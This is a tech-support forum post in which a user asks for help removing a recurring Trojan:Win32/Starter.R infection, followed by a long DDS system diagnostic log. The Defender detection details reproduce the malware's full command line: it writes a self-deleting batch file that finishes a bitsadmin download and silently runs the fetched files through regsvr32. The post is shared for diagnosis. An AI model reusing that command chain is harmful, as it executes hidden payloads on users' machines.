Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help

User Tag List

Trojan:Win32/Starter.R

This is a discussion on Trojan:Win32/Starter.R within the Virus/Trojan/Spyware Help forums, part of the Tech Support Forum category. Defender finds the threat Trojan:Win32/Starter.R about 3-4x a day. Each time I remove it, but awhile later it hits on


Closed Thread
 
Thread Tools Search this Thread
Old 10-09-2018, 06:31 PM   #1
Registered Member
 
Join Date: Jun 2007
Location: Tulsa, Oklahoma
Posts: 36
OS: 10



Defender finds the threat Trojan:Win32/Starter.R about 3-4x a day. Each time I remove it, but awhile later it hits on it again. I've also ran Malwarebytes and removed it with it several times, but still apparently shows back up. I've seen online when I was searching for info on it, several sites saying it can be easy to permanently remove BUT by using their program. I don't trust just every program that boasts being a legit virus remover. Needless to say I figured I'd come here (cause I know to trust any program you may recommend, if needed).
Thank you for your time and assistance.

P.S. I don't think I have easy access to windows boot cd

THIS IS WHAT "DETAILS" DEFENDER GIVES EACH TIME IT NOTIFIES ME OF IT

Trojan:Win32/Starter.R
CmdLine: \Device\HarddiskVolume4\Windows\System32\cmd.exe "cmd.exe" /c start /min cmd /c "(echo @echo off > "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /complete 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo bitsadmin /cancel 89331b0d-24f7-1 ^> nul >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo if exist "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" goto q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & for /f %i in ('dir /a:-d /b /w "C:\ProgramData\89331b0d-24f7-1\*.tmp"') do (echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\%i" >> "C:\ProgramData\89331b0d-24f7-1\x.bat")) > nul & echo :q >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo start /b /min regsvr32.exe /s /n /i:"!=2c250bf689331b0c " "C:\ProgramData\89331b0d-24f7-1\89331b0d-24f7-1.d" >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & echo del "C:\ProgramData\89331b0d-24f7-1\x.bat" ^& exit >> "C:\ProgramData\89331b0d-24f7-1\x.bat" & "C:\ProgramData\89331b0d-24f7-1\x.bat""






DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.17134.1
Run by Christopher&Gabriell at 20:04:03 on 2018-10-09
Microsoft Windows 10 Home 10.0.17134.0.1252.1.1033.18.3554.1271 [GMT -5:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\svchost.exe -k RPCSS -p
C:\WINDOWS\system32\fontdrvhost.exe
C:\WINDOWS\system32\dwm.exe
C:\WINDOWS\system32\svchost.exe -k netsvcs -p
C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\system32\atiesrxx.exe
C:\WINDOWS\system32\atieclxx.exe
C:\WINDOWS\system32\svchost.exe -k LocalService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Program Files\IDT\WDM\STacSV64.exe
C:\WINDOWS\system32\svchost.exe -k appmodel -p
C:\WINDOWS\System32\svchost.exe -k NetworkService -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\Hpservice.exe
C:\WINDOWS\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\WINDOWS\system32\svchost.exe -k LocalSystemNetworkRestricted -p
C:\WINDOWS\System32\spoolsv.exe
C:\WINDOWS\system32\dashost.exe
C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
C:\WINDOWS\system32\svchost.exe -k apphost
C:\WINDOWS\System32\svchost.exe -k utcsvc -p
C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
C:\WINDOWS\system32\SearchIndexer.exe
C:\WINDOWS\System32\svchost.exe -k netsvcs
C:\WINDOWS\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\sihost.exe
C:\WINDOWS\system32\svchost.exe -k UnistackSvcGroup
C:\WINDOWS\system32\taskhostw.exe
C:\Program Files\Core Temp\Core Temp.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\PROGRAM FILES\SYNAPTICS\SYNTP\SYNTPHELPER.EXE
C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\WINDOWS\system32\AUDIODG.EXE
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
C:\Windows\System32\CastSrv.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
C:\Program Files\Windows Defender\MSASCuiL.exe
C:\Program Files\IDT\WDM\sttray64.exe
C:\Program Files (x86)\Ruiware\WinPatrol\WinPatrol.exe
C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
C:\Windows\System32\SystemSettingsBroker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\ApplicationFrameHost.exe
C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
C:\WINDOWS\system32\osk.exe
C:\Program Files\WindowsApps\Microsoft.WindowsStore_11809.1001.8.0_x64__8wekyb3d8bbwe\WinStore.App.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2018.18081.14710.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
C:\WINDOWS\system32\SettingSyncHost.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera_crashreporter.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Program Files\Common Files\Microsoft Shared\Ink\InputPersonalization.exe
C:\WINDOWS\SysWOW64\DllHost.exe
C:\Program Files\Windows NT\Accessories\wordpad.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\WINDOWS\system32\svchost.exe -k LocalService
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
C:\WINDOWS\system32\browser_broker.exe
C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\WINDOWS\system32\Windows.WARP.JITService.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Users\Christopher&Gabriell\AppData\Local\Programs\Opera\55.0.2994.61\opera.exe
C:\Windows\System32\smartscreen.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
svchost.exe
C:\WINDOWS\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://www.google.com/
uLocal Page = %11%\blank.htm
BHO: HP Network Check Helper: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll
uRun: [WinPatrol] C:\Program Files (x86)\Ruiware\WinPatrol\winpatrol.exe
mRun: [HP CoolSense] C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe -byrunkey
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe" MSRun
mPolicies-System: DSCAutomationHostEnabled = dword:2
mPolicies-System: EnableFullTrustStartupTasks = dword:2
mPolicies-System: EnableUwpStartupTasks = dword:2
mPolicies-System: SupportFullTrustStartupTasks = dword:1
mPolicies-System: SupportUwpStartupTasks = dword:1
IE: E&xport to Microsoft Excel - C:\PROGRA~1\MICROS~1\Office16\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\PROGRA~1\MICROS~1\Office16\ONBttnIE.dll/105
IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIE.dll
IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office16\OCHelper.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} - hxxp://www.pcpitstop.com/nirvana/controls/pcmatic.cab
TCP: Interfaces\{982D5C35-5D95-44B3-84D9-0D16030AAD83} : DHCPNameServer = 68.105.28.11 68.105.29.11 68.105.28.12
Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL
Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\Windows\SysWOW64\tbauth.dll
SSODL: WebCheck - <orphaned>
CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
x64-Run: [SecurityHealth] C:\Program Files (x86)\Windows Defender\MSASCuiL.exe
x64-Run: [SynTPEnh] C:\Program Files (x86)\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SysTrayApp] C:\Program Files\IDT\WDM\sttray64.exe
x64-mPolicies-System: DSCAutomationHostEnabled = dword:2
x64-mPolicies-System: EnableFullTrustStartupTasks = dword:2
x64-mPolicies-System: EnableUwpStartupTasks = dword:2
x64-mPolicies-System: SupportFullTrustStartupTasks = dword:1
x64-mPolicies-System: SupportUwpStartupTasks = dword:1
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office16\ONBttnIE.dll
x64-IE: {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office16\OCHelper.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office16\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807583E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSOXMLMF.DLL
x64-Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL
x64-Handler: tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-Handler: windows.tbauth - {14654CA6-5711-491D-B89A-58E571679951} - C:\WINDOWS\System32\tbauth.dll
x64-SSODL: WebCheck - <orphaned>
x64-mASetup: {2C7339CF-2B09-4501-B3F3-F3508C9228ED} - /UserInstall
x64-mASetup: {89820200-ECBD-11cf-8B85-00AA005B4340} - U
x64-mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\68.0.3440.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
x64-CLSID: {603D3801-BD81-11d0-A3A5-00C04FD706EC} - C:\WINDOWS\System32\windows.storage.dll
.
============= SERVICES / DRIVERS ===============
.
R0 intelpep;Intel(R) Power Engine Plug-in Driver;C:\WINDOWS\System32\drivers\intelpep.sys [2018-4-11 177192]
R0 iorate;Disk I/O Rate Filter Driver;C:\WINDOWS\System32\drivers\iorate.sys [2018-4-11 58272]
R0 SgrmAgent;System Guard Runtime Monitor Agent;C:\WINDOWS\System32\drivers\SgrmAgent.sys [2018-4-11 63896]
R0 volume;Volume driver;C:\WINDOWS\System32\drivers\volume.sys [2018-4-11 16288]
R0 WindowsTrustedRT;Windows Trusted Execution Environment Class Extension;C:\WINDOWS\System32\drivers\WindowsTrustedRT.sys [2018-8-17 72768]
R0 WindowsTrustedRTProxy;Microsoft Windows Trusted Runtime Secure Service;C:\WINDOWS\System32\drivers\WindowsTrustedRTProxy.sys [2018-4-11 18472]
R0 Wof;Windows Overlay File System Filter Driver;C:\WINDOWS\System32\drivers\wof.sys [2018-4-11 209816]
R1 afunix;afunix;C:\WINDOWS\System32\drivers\afunix.sys [2018-4-11 39424]
R1 ahcache;Application Compatibility Cache;C:\WINDOWS\System32\drivers\ahcache.sys [2018-4-11 254464]
R1 bam;Background Activity Moderator Driver;C:\WINDOWS\System32\drivers\bam.sys [2018-4-11 60320]
R1 CLVirtualDrive;CLVirtualDrive;C:\WINDOWS\System32\drivers\CLVirtualDrive.sys [2018-8-16 92536]
R1 FileCrypt;FileCrypt;C:\WINDOWS\System32\drivers\filecrypt.sys [2018-4-11 55808]
R1 GpuEnergyDrv;GPU Energy Driver;C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-4-11 8192]
R2 AMD External Events Utility;AMD External Events Utility;C:\WINDOWS\System32\atiesrxx.exe [2014-9-15 257032]
R2 AMD FUEL Service;AMD FUEL Service;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [2014-9-15 344064]
R2 AODDriver4.3;AODDriver4.3;C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\aoddriver2.sys [2014-2-11 59616]
R2 APXACC;AppEx Networks Accelerator LWF;C:\WINDOWS\System32\drivers\appexDrv.sys [2018-9-20 228032]
R2 CDPSvc;Connected Devices Platform Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R2 CldFlt;Windows Cloud Files Filter Driver;C:\WINDOWS\System32\drivers\cldflt.sys [2018-8-17 414720]
R2 CoreMessagingRegistrar;CoreMessaging;C:\WINDOWS\System32\svchost.exe -k LocalServiceNoNetwork -p [2018-4-11 51288]
R2 DiagTrack;Connected User Experiences and Telemetry;C:\WINDOWS\System32\svchost.exe -k utcsvc -p [2018-4-11 51288]
R2 DusmSvc;Data Usage;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R2 hpsrv;HP Service;C:\WINDOWS\System32\hpservice.exe [2012-9-24 31040]
R2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [2017-11-21 333688]
R2 HPWMISVC;HPWMISVC;C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [2012-9-7 35232]
R2 IconMan_R;IconMan_R;C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [2018-9-21 2451456]
R2 SecurityHealthService;Windows Defender Security Center Service;C:\WINDOWS\System32\SecurityHealthService.exe [2018-8-17 760888]
R2 SgrmBroker;System Guard Runtime Monitor Broker;C:\WINDOWS\System32\SgrmBroker.exe [2018-4-11 163336]
R2 storqosflt;Storage QoS Filter Driver;C:\WINDOWS\System32\drivers\storqosflt.sys [2018-4-11 82432]
R2 SynTPEnhService;SynTPEnh Caller Service;C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [2016-4-28 253960]
R2 UserManager;User Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 UsoSvc;Update Orchestrator Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R2 wcifs;Windows Container Isolation;C:\WINDOWS\System32\drivers\wcifs.sys [2018-4-11 151960]
R3 ALSysIO;ALSysIO;C:\Users\CHRIST~1\AppData\Local\Temp\ALSysIO64.sys [2018-8-20 46384]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\WINDOWS\System32\drivers\AtihdWT6.sys [2017-11-17 111112]
R3 CAD;Charge Arbitration Driver;C:\WINDOWS\System32\drivers\CAD.sys [2018-4-11 60320]
R3 camsvc;Capability Access Manager Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 DsSvc;Data Sharing Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 lfsvc;Geolocation Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 LicenseManager;Windows License Manager Service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
R3 NcbService;Network Connection Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 NdisVirtualBus;Microsoft Virtual Network Adapter Enumerator;C:\WINDOWS\System32\drivers\NdisVirtualBus.sys [2018-4-11 20992]
R3 NgcCtnrSvc;Microsoft Passport Container;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 NgcSvc;Microsoft Passport;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
R3 RSP2STOR;Realtek PCIE CardReader Driver - P2;C:\WINDOWS\System32\drivers\RtsP2Stor.sys [2018-8-16 310528]
R3 rt640x64;Realtek RT640 NT Driver;C:\WINDOWS\System32\drivers\rt640x64.sys [2018-4-11 604160]
R3 StateRepository;State Repository Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
R3 TimeBrokerSvc;Time Broker;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
R3 TokenBroker;Web Account Manager;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
R3 usbfilter;AMD USB Filter Driver;C:\WINDOWS\System32\drivers\usbfilter.sys [2018-8-16 58536]
R3 WarpJITSvc;WarpJITSvc;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
R3 WdNisDrv;Windows Defender Antivirus Network Inspection System Driver;C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [2018-9-25 60584]
R3 WirelessButtonDriver64;HP Wireless Button Driver Service;C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [2018-5-11 34944]
S2 DoSvc;Delivery Optimization;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S2 MapsBroker;Downloaded Maps Manager;C:\WINDOWS\System32\svchost.exe -k NetworkService -p [2018-4-11 51288]
S3 AcpiDev;ACPI Devices driver;C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-4-11 20480]
S3 ADP80XX;ADP80XX;C:\WINDOWS\System32\drivers\adp80xx.sys [2018-4-11 1135520]
S3 AJRouter;AllJoyn Router Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 amd_sata;amd_sata;C:\WINDOWS\System32\drivers\amd_sata.sys [2012-9-2 79528]
S3 amd_xata;amd_xata;C:\WINDOWS\System32\drivers\amd_xata.sys [2012-9-2 26280]
S3 amdkmafd;AMD Audio Bus Lower Filter;C:\WINDOWS\System32\drivers\amdkmafd.sys [2012-9-22 21160]
S3 applockerfltr;Smartlocker Filter Driver;C:\WINDOWS\System32\drivers\applockerfltr.sys [2018-4-11 18432]
S3 AppReadiness;App Readiness;C:\WINDOWS\System32\svchost.exe -k AppReadiness -p [2018-4-11 51288]
S3 AppXSvc;AppX Deployment Service (AppXSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 bcmfn2;bcmfn2 Service;C:\WINDOWS\System32\drivers\bcmfn2.sys [2018-4-11 9728]
S3 bindflt;Windows Bind Filter Driver;C:\WINDOWS\System32\drivers\bindflt.sys [2018-4-11 92056]
S3 BTAGService;Bluetooth Audio Gateway Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted [2018-4-11 51288]
S3 BthAvctpSvc;AVCTP service;C:\WINDOWS\System32\svchost.exe -k LocalService -p [2018-4-11 51288]
S3 bttflt;Microsoft Hyper-V VHDPMEM BTT Filter;C:\WINDOWS\System32\drivers\bttflt.sys [2018-4-11 38304]
S3 buttonconverter;Service for Portable Device Control devices;C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-4-11 39936]
S3 CapImg;HID driver for CapImg touch screen;C:\WINDOWS\System32\drivers\capimg.sys [2018-4-11 123392]
S3 cht4iscsi;cht4iscsi;C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-4-11 321432]
S3 cht4vbd;Chelsio Virtual Bus Driver;C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-4-11 1836952]
S3 ClipSVC;Client License Service (ClipSVC);C:\WINDOWS\System32\svchost.exe -k wsappx -p [2018-4-11 51288]
S3 DevQueryBroker;DevQuery Background Discovery Broker;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 diagnosticshub.standardcollector.service;Microsoft (R) Diagnostics Hub Standard Collector Service;C:\WINDOWS\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe [2018-8-17 90624]
S3 diagsvc;Diagnostic Execution Service;C:\WINDOWS\System32\svchost.exe -k diagnostics [2018-4-11 51288]
S3 DmEnrollmentSvc;Device Management Enrollment Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 dmwappushservice;dmwappushsvc;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 embeddedmode;Embedded Mode;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 EntAppSvc;Enterprise App Management Service;C:\WINDOWS\System32\svchost.exe -k appmodel -p [2018-4-11 51288]
S3 FrameServer;Windows Camera Frame Server;C:\WINDOWS\System32\svchost.exe -k Camera [2018-4-11 51288]
S3 genericusbfn;Generic USB Function Class;C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-4-11 20992]
S3 GraphicsPerfSvc;GraphicsPerfSvc;C:\WINDOWS\System32\svchost.exe -k GraphicsPerfSvcGroup [2018-4-11 51288]
S3 hidinterrupt;Common Driver for HID Buttons implemented with interrupts;C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-4-11 50592]
S3 hpqcaslwmiex;HP CASL Framework Service;C:\Program Files (x86)\HP\Shared\hpqwmiex.exe [2016-6-4 1031704]
S3 HvHost;HV Host Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver;C:\WINDOWS\System32\drivers\mshwnclx.sys [2018-4-11 27136]
S3 iagpio;Intel Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iagpio.sys [2018-4-11 36864]
S3 iai2c;Intel(R) Serial IO I2C Host Controller;C:\WINDOWS\System32\drivers\iai2c.sys [2018-4-11 91648]
S3 iaLPSS2i_GPIO2;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-4-11 79360]
S3 iaLPSS2i_GPIO2_BXT_P;Intel(R) Serial IO GPIO Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-4-11 88576]
S3 iaLPSS2i_I2C;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-4-11 171520]
S3 iaLPSS2i_I2C_BXT_P;Intel(R) Serial IO I2C Driver v2;C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-4-11 174592]
S3 iaLPSSi_GPIO;Intel(R) Serial IO GPIO Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_GPIO.sys [2018-4-11 38128]
S3 iaLPSSi_I2C;Intel(R) Serial IO I2C Controller Driver;C:\WINDOWS\System32\drivers\iaLPSSi_I2C.sys [2018-4-11 113152]
S3 iaStorA;iaStorA;C:\WINDOWS\System32\drivers\iaStorA.sys [2012-9-28 650808]
S3 iaStorAVC;Intel Chipset SATA RAID Controller;C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-4-11 885144]
S3 ibbus;Mellanox InfiniBand Bus/AL (Filter Driver);C:\WINDOWS\System32\drivers\ibbus.sys [2018-4-11 526232]
S3 icssvc;Windows Mobile Hotspot Service;C:\WINDOWS\System32\svchost.exe -k LocalServiceNetworkRestricted -p [2018-4-11 51288]
S3 IndirectKmd;Indirect Displays Kernel-Mode Driver;C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-4-11 38912]
S3 InstallService;Microsoft Store Install Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 IPT;IPT;C:\WINDOWS\System32\drivers\ipt.sys [2018-4-11 32256]
S3 IpxlatCfgSvc;IP Translation Configuration Service;C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p [2018-4-11 51288]
S3 ItSas35i;ItSas35i;C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-4-11 145816]
S3 LSI_SAS2i;LSI_SAS2i;C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-4-11 124312]
S3 LSI_SAS3i;LSI_SAS3i;C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-4-11 128408]
S3 LxpSvc;Language Experience Service;C:\WINDOWS\System32\svchost.exe -k netsvcs [2018-4-11 51288]
S3 mausbhost;MA-USB Host Controller Driver;C:\WINDOWS\System32\drivers\mausbhost.sys [2018-4-11 505240]
S3 mausbip;MA-USB IP Filter Driver;C:\WINDOWS\System32\drivers\mausbip.sys [2018-4-11 56736]
S3 MBAMService;Malwarebytes Service;C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [2018-8-29 6541008]
S3 megasas2i;megasas2i;C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-4-11 75160]
S3 megasas35i;megasas35i;C:\WINDOWS\System32\drivers\megasas35i.sys [2018-4-11 82328]
S3 mlx4_bus;Mellanox ConnectX Bus Enumerator;C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-4-11 842648]
S3 NaturalAuthentication;Natural Authentication;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 ndfltr;NetworkDirect Service;C:\WINDOWS\System32\drivers\ndfltr.sys [2018-4-11 108952]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library;C:\WINDOWS\System32\drivers\NetAdapterCx.sys [2018-4-11 175104]
S3 NetSetupSvc;Network Setup Service;C:\WINDOWS\System32\svchost.exe -k netsvcs -p [2018-4-11 51288]
S3 netvsc;netvsc;C:\WINDOWS\System32\drivers\netvsc.sys [2018-4-11 197632]
S3 nvdimm;Microsoft NVDIMM device driver;C:\WINDOWS\System32\drivers\nvdimm.sys [2018-4-11 104448]
S3 ose64;Office 64 Source Engine;C:\Program Files\Common Files\microsoft shared\Source Engine\OSE.EXE [2018-6-13 253640]
S3 percsas2i;percsas2i;C:\WINDOWS\System32\drivers\percsas2i.sys [2018-4-11 58776]
